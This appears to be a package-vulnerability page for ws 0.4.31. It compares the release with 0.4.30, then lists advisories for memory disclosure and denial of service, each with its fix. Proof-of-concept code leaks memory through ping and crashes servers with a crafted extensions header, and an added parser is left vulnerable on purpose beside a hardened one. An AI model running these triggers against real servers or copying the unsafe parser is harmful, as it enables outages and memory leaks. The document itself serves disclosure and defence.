ws version 0.4.31 is a minor update to the WebSocket library, succeeding version 0.4.30. Both versions aim to provide a simple, fast, well-tested WebSocket implementation for Node.js that adheres to RFC 6455. Developers familiar with 0.4.30 will find a largely identical API and feature set in 0.4.31. The runtime dependencies are unchanged: nan for native Node.js addons, options for configuration handling, commander for command-line interfaces, and tinycolor for color manipulation. The development dependencies (ansi, mocha, should, benchmark, and expect.js) are also unchanged, so the testing and benchmarking infrastructure is likely the same.
The key difference is the release date. Version 0.4.31 was released on 2013-09-23, approximately three weeks after 0.4.30, which was released on 2013-08-30. This suggests that 0.4.31 is primarily a bug-fix or minor enhancement release. Developers should consider upgrading to 0.4.31 to benefit from any fixes or improvements made since the previous version. While the data does not state what was fixed, the quick turnaround between versions strongly hints at a maintenance release addressing discovered issues, improving stability and reliability for applications that use this widely adopted WebSocket library for real-time communication.
All vulnerabilities affecting version 0.4.31 of the package
Remote Memory Disclosure in ws
Versions of ws prior to 1.0.1 are affected by a remote memory disclosure vulnerability.
In certain rare circumstances, applications that allow users to control the arguments of a client.ping() call will cause ws to send the contents of an allocated but non-zero-filled buffer to the server. This may disclose sensitive information that still exists in memory after previous use of that memory for other tasks.
var ws = require('ws')
var server = new ws.Server({ port: 9000 })
var client = new ws('ws://localhost:9000')
client.on('open', function () {
  console.log('open')
  client.ping(50) // in ws < 1.0.1 a numeric argument allocates a 50-byte buffer that is never zeroed and sends it as the ping payload
  client.on('pong', function (data) {
    console.log('got pong')
    console.log(data) // the server echoes the payload back: whatever was left in that memory
  })
})
Update to version 1.0.1 or greater.
DoS due to excessively large websocket message in ws
Affected versions of ws do not appropriately limit the size of incoming WebSocket payloads, which may result in a denial of service condition when the Node process crashes after receiving a large payload.
Update to version 1.1.1 or later.
Alternatively, set the maxPayload option for the ws server to a value smaller than 256MB.
Denial of Service in ws
Affected versions of ws can crash when a specially crafted Sec-WebSocket-Extensions header containing Object.prototype property names as extension or parameter names is sent.
const WebSocket = require('ws');
const net = require('net');
const wss = new WebSocket.Server({ port: 3000 }, function () {
  const payload = 'constructor'; // or ',;constructor'
  const request = [
    'GET / HTTP/1.1',
    'Connection: Upgrade',
    'Sec-WebSocket-Key: test',
    'Sec-WebSocket-Version: 8',
    `Sec-WebSocket-Extensions: ${payload}`,
    'Upgrade: websocket',
    '\r\n'
  ].join('\r\n');
  const socket = net.connect(3000, function () {
    socket.resume();
    socket.write(request);
  });
});
Update to version 3.3.1 or later.
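As an added example, not code from the advisory or from ws itself, the following contrasts a header parser of the vulnerable shape (plain-object lookups keyed by names taken from the header, so "constructor" resolves to Object.prototype.constructor and the push call throws) with a hardened one that keeps names in a Map and restricts them to RFC 7230 tokens. Only the header format and the extension name shown above are taken from the page; the function names and the simplified grammar are assumptions of this example.

```javascript
// Added example, not code from ws: a minimal Sec-WebSocket-Extensions parser
// in the shape that crashed ws before 3.3.1, next to a hardened version.
// Simplified grammar (RFC 6455 section 9.1): "ext1; p=v; q, ext2; r=v"

// Vulnerable shape: extension names index a plain object, so an inherited
// name such as "constructor" resolves to Object.prototype.constructor.
function parseExtensionsUnsafe(header) {
  const extensions = {};
  for (const entry of header.split(',')) {
    const [name, ...rawParams] = entry.split(';').map((s) => s.trim());
    const params = {};
    for (const p of rawParams) {
      const [key, value] = p.split('=');
      params[key] = value === undefined ? true : value;
    }
    if (!extensions[name]) extensions[name] = []; // "constructor" is truthy, so no array is created
    extensions[name].push(params); // TypeError: push is not a function, and the process crashes
  }
  return extensions;
}

// Hardened shape: header-supplied names never become property lookups on a
// prototype-bearing object. Map has no inherited keys, and names must be
// RFC 7230 tokens, so "constructor" is just an ordinary key.
const TOKEN = /^[!#$%&'*+\-.^_`|~0-9A-Za-z]+$/;

function parseExtensionsSafe(header) {
  const extensions = new Map();
  for (const entry of header.split(',')) {
    const [name, ...rawParams] = entry.split(';').map((s) => s.trim());
    if (!TOKEN.test(name)) throw new SyntaxError(`bad extension name: ${JSON.stringify(name)}`);
    const params = new Map();
    for (const p of rawParams) {
      const eq = p.indexOf('=');
      const key = eq === -1 ? p : p.slice(0, eq).trim();
      const value = eq === -1 ? true : p.slice(eq + 1).trim();
      if (!TOKEN.test(key)) throw new SyntaxError(`bad parameter name: ${JSON.stringify(key)}`);
      params.set(key, value);
    }
    if (!extensions.has(name)) extensions.set(name, []);
    extensions.get(name).push(params);
  }
  return extensions;
}

// Returns true when the vulnerable parser dies with a TypeError on this header.
function crashes(header) {
  try { parseExtensionsUnsafe(header); return false; } catch (e) { return e instanceof TypeError; }
}
```

A server using the hardened parser should catch the SyntaxError during the upgrade handshake and answer with a 400 before closing the socket, so a malformed header costs one rejected connection rather than the process.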